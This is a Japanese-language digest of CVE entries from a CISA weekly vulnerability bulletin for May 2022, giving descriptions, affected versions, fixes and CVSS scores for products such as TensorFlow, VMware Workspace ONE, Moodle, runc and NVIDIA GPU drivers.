CGM_NIST_Loader.dll ライブラリには、特別に細工された CGM ファイルをパースする際に、二重解放の脆弱性があります。攻撃者は、この脆弱性を利用して、現在のプロセスのコンテキストでコードを実行することができます 

NIST: NVD Base Score:  7.8 HIGH
 
CVE-2022-29033
JT2Go (V13.3.0.3未満の全バージョン), Teamcenter Visualization V13.3 (V13.3.0.3未満の全バージョン), Teamcenter Visualization V14.0 (V14.0.0.1未満の全バージョンに脆弱性が確認されました。
CGM_NIST_Loader.dll ライブラリには、特別に細工された CGM ファイルを解析する際に、初期化されないポインタが解放される脆弱性があります。攻撃者は、この脆弱性を利用して、現在のプロセスのコンテキストでコードを実行することができます
 
NIST: NVD Base Score:  7.8 HIGH
 
  Seimensという会社も実在するようだが、
  「Weakness Enumeration」にはSiemensと書かれている。
  と思ったら、下の方にSiemanならびにSiemensの個々の製品が、計15件 登場していた。
  心当たりの方は「出典」を参照下さい。
 

shopify -- hydrogen

CVE-2022-29230
Hydrogen は、Shopify を利用した動的なカスタムストアのフロントを構築するための React ベースのフレームワークです。
Hydrogen で構築されたページには、任意のユーザーがスクリプトを実行できるクロスサイトスクリプティング (XSS) 脆弱性の可能性があります。
この問題は、Hydrogen のバージョン 0.10.0 から 0.18.0 までのすべてのバージョンに影響します。
この脆弱性は、Hydrogen のデータがユーザーによって制御されているアプリケーションで悪用されます。すべての Hydrogen ユーザーは、プロジェクトをバージョン 0.19.0 にアップグレードする必要があります。
現在、回避策はありませんので、ユーザーはできるだけ早くアップデートしてください。また、コンテンツセキュリティポリシーは、本脆弱性の有効な緩和策ではありません。
 
NIST: NVD        Base Score:  5.4 MEDIUM 
  Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CNA: GitHub, Inc. Base Score:  6.3 MEDIUM 
 

tenable -- toll_tax_management_system

CVE-2022-30053
Toll Tax Management System 1.0では、idパラメータにSQLインジェクション攻撃の脆弱性があるようです。
 
NIST: NVD Base Score:  9.8 CRITICAL
 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 

tensorflow -- tensorflow 

24件、内HIGHは下記2件

CVE-2022-29208
TensorFlow は、機械学習のためのオープンソースプラットフォームです。
バージョン 2.9.0, 2.8.1, 2.7.2, 2.6.4 より前の `tf.raw_ops.EditDistance` の実装には、不完全なバリデーションが存在します。
ユーザが負の値を渡すと、segmentation fault に基づくサービス拒否を引き起こす可能性があります。コード中の複数の場所で、書き込み操作のためのインデックスを計算することができます。しかし、既存の検証では、配列の上限に対してのみチェックが行われます。
したがって、`loc`に負の値を生成するように入力を加工することで、 配列の前に書き込むことが可能である。
バージョン 2.9.0, 2.8.1, 2.7.2, 2.6.4 では、この問題に対するパッチが含まれています。
 
CNA:  GitHub, Inc. Base Score:  7.1 HIGH
 
CVE-2022-29216
TensorFlow は、機械学習のためのオープンソースプラットフォームです。
バージョン 2.9.0, 2.8.1, 2.7.2, 2.6.4 より前の TensorFlow  `saved_model_cli` ツールには、コードインジェクションの脆弱性が存在します。
これは、リバースシェルを開くために使用することができます。
このコードパスは、メンテナがnumpy式を引数として使用するテストケースをいくつか持っていたため、互換性の理由から維持されていました。しかし、このツールは常に手動で実行されることを考えると、これによる影響はまだ深刻ではありません。
メンテナンス担当者は、現在、 `safe=False` 引数を削除して、すべてのパースが `eval` を呼び出すことなく行われるようにしました。
このパッチはバージョン 2.9.0, 2.8.1, 2.7.2, 2.6.4 で利用可能です。
 
CNA:  GitHub, Inc. Base Score:  7.8 HIGH
 

thinfinity -- vnc

CVE-2022-25227
Thinfinity VNC v4.0.0.1 には、Cross-Origin Resource Sharing (CORS) の脆弱性があり、権限のない遠隔地の攻撃者がユーザーを騙して不正なサイトを閲覧させた場合、Web ソケットリクエストを送信して RCE を達成するために使用できる 'ID' を取得することができる可能性があります。
 
NIST: NVD Base Score:  8.8 HIGH
 

trend_micro -- password_manager_(consumer)

CVE-2022-30523
Trend Micro Password Manager (Consumer) バージョン 5.0.0.1266 以下には、Link Following Privilege Escalation の脆弱性があり、低権限のローカル攻撃者が任意のフォルダの内容を SYSTEM として削除し、影響を受けるマシンで特権を昇格するために使用することが可能です。
 
NIST: NVD Base Score:  7.8 HIGH
 Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 
ベンダーアドバイザリーに最新バージョンが案内されている。
 

vmware -- spring_security

CVE-2022-22978
Spring Security バージョン 5.5.6 および 5.6.3 とそれ以前の未サポートバージョンでは、RegexRequestMatcher の設定を誤ると、一部のサーブレットコンテナで簡単にバイパスされる可能性があることが判明しました。
正規表現に `.` を含む RegexRequestMatcher を使用したアプリケーションは、認証回避の脆弱性がある可能性があります。
 
NIST: NVD Base Score:  9.8 CRITICAL 
  Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 

vmware -- workspace_one

CVE-2022-22972
VMware Workspace ONE AccessIdentity Manager、およびvRealize Automationには、ローカルドメインのユーザーに影響を与える認証バイパスの脆弱性が存在します。
UI にネットワークアクセスできる悪意のある行為者は、認証を必要とせずに管理アクセスを取得できる可能性があります。
 
NIST: NVD Base Score:  9.8 CRITICAL 
 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 
ベンダーアドバイザリー に解決済みバージョンが案内されている。
 
CVE-2022-22973
VMware Workspace ONE Access and Identity Managerには、特権昇格の脆弱性があります。
ローカルアクセス権を持つ悪意のある行為者は、「rootに特権を昇格させることができます。
 
NIST: NVD Base Score:  7.8 HIGH 
 Vector:  CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

出典

Bulletin (SB22-143)
Vulnerability Summary for the Week of May 16, 2022 (release date: May 24)

Vulnerability Summary for the Week of May 16, 2022、その3

moodle -- moodle  

 全5件 、執筆時、クリティカルなものは下記2件 

  • ムードル は、オープンソースのeラーニングプラットフォームである。同種のシステムの中では比較的多くのユーザ数を持つ。 ムードルは教育者が質の高いオンライン学習過程を作ることを助けるパッケージソフトである。 (ウィキペディア)
ログインの失敗を数えるために使用されるロジックが、アカウントロックアウトのしきい値をバイパスしてしまうという欠陥が、Moodle に見つかりました。
 
NIST: NVD  Base Score:  9.8 CRITICAL
 
ベンダーアドバイザリー曰く「4.0.1, 3.11.7, 3.10.11 and 3.9.14で修正済み」
moodle の不具合で、基準の設定に関連する Badges のコードに SQL インジェクションのリスクがあることが確認されました。
 
NIST: NVD Base Score:  9.8 CRITICAL
 
ベンダーアドバイザリー曰く「4.0.1, 3.11.7, 3.10.11 and 3.9.14で修正済み」
 

nvidia -- gpu_display_driver 

10件、うち執筆日現在でHIGHなものが4件

NVIDIA GPU Display Driver for Windows and Linux には、カーネルモードレイヤーに脆弱性があり、ネットワーク上の非特権一般ユーザーが特別に細工したシェーダーを介して、境界外書き込みを引き起こし、コードの実行、サービス拒否、権限の昇格、情報漏洩、データ改ざんの原因となる可能性があります。また、影響範囲は、他のコンポーネントにまで及ぶ可能性があります。
 
CNA:  NVIDIA Corporation Base Score:  8.5 HIGH
 Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
 
ベンダーアドバイザリーに対象ドライバパーションと対応済みバージョンの一覧がある。
NVIDIA GPU Display Driver for Windows には、DirectX11 のユーザーモードドライバ (nvwgf2um/x.dll) に脆弱性があり、ネットワーク上の未認可の攻撃者が特別に細工したシェーダを介して境界外書き込みを行い、コード実行によるサービス拒否、権限の昇格、情報漏洩、データ改ざんの原因となる可能性があります。また、影響範囲は、他のコンポーネントにまで及ぶ可能性があります。
 
CNA:  NVIDIA Corporation Base Score:  8.5 HIGH
 Vector:  CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
  攻撃元区分(AV) = ネットワーク(N)
  攻撃条件の複雑さ(AC) = (H)
  必要な特権レベル(PR) = (L)
  ユーザ関与レベル(UI) = 不要(N)
  

open_containers -- runc

CVE-2022-29162
runc  OCI (*1)仕様に従って Linux 上でコンテナを生成し実行するための CLI ツールです。
バージョン 1.1.2 以前の runc には、`runc exec --cap` が空でない継承可能な Linux プロセス能力を持つプロセスを作成し、非定型の Linux 環境を作り、継承可能なファイル能力を持つプログラムが execve(2) 中にそれらの能力を許可されたセットまで上昇させるというバグが発見されています。
このバグは、コンテナのセキュリティサンドボックスには影響を与えず、継承可能なセットにコンテナのバウンディングセットに含まれる以上の能力が含まれることはありませんでした。 
 
このバグは runc 1.1.2 で修正されました。
この修正は `runc exec --cap` の動作を変更し、実行中のプロセスに付与される追加能力 (引数 `--cap` で指定に継承可能な能力を含めないようにしました。
また、`runc spec` では、作成された OCI spec (`config.json`) ファイルのサンプルに継承可能な能力を設定しないように変更されました。
 
NIST: NVD Base Score:  7.8 HIGH
 
*1 Open Container InitiativeOCI)は、OSレベル仮想化の一種である「コンテナ」のフォーマット・ランタイムの業界標準策定を目的として設立されたイニシアチブである。 Linux Foundationプロジェクトの1つである。
 

openjs_foundation -- nodejs

CVE-2022-24434
この問題は、dicer パッケージのすべてのバージョンに影響します。悪意のある攻撃者が修正したフォームをサーバに送信し、nodejs サービスをクラッシュさせることが可能です。攻撃者は、ペイロードを何度も送信し、サービスを継続的にクラッシュさせることができます。
 
NIST: NVD Base Score:  N/A NVD score not yet provided.
 
CNA:  Snyk Base Score:  7.5 HIGH
 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
 

oracle -- e-business_suite

CVE-2022-21500 
Oracle E-Business Suiteの脆弱性(コンポーネント:プロキシの管理)。
影響を受けるサポートされているバージョンは12.2です。
簡単に悪用可能な脆弱性により、認証されていない攻撃者がHTTP経由でネットワークにアクセスしてOracle E-Business Suiteを危険にさらす可能性があります。
この脆弱性の攻撃が成功すると、重要なデータへの不正アクセスや、すべてのOracle E-Business Suiteアクセス可能データへの完全なアクセスが発生する可能性があります。
 
注:攻撃を成功させるには認証が必要ですが、ユーザーは自己登録される場合があります。
Oracle E-Business Suite12.1はこの脆弱性の影響を受けません。
詳細については、パッチ可用性ドキュメントを参照してください。
 
CNA:  Oracle Base Score:  7.5 HIGH
 Vector:  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
 
ベンダーアドバイザリーにパッチ アベイラビリティ ドキュメントがある。
 

packet_storm -- online_sports_complex_booking_system 

全2件
CVE-2022-28962
Online Sports Complex Booking System 1.0 には、 /scbs/classes/Users.php?f=delete_client を経由した SQL インジェクションの脆弱性が存在します。
 
NIST: NVD Base Score:  9.8 CRITICAL
 
※ 他にも packet_storm関連が全8件取り上げられている。
 

ruby -- ruby

CVE-2019-25061
1.0.0 までの Ruby  random_password_generator (別名 RandomPasswordGenerator) gem は、Kernel#rand を使ってパスワードを生成しており、その周期性により、パスワード予測を容易化することができます。
 
NIST: NVD Base Score:  7.5 HIGH

出典 

Bulletin (SB22-143)
Vulnerability Summary for the Week of May 16, 2022 (release date: May 24)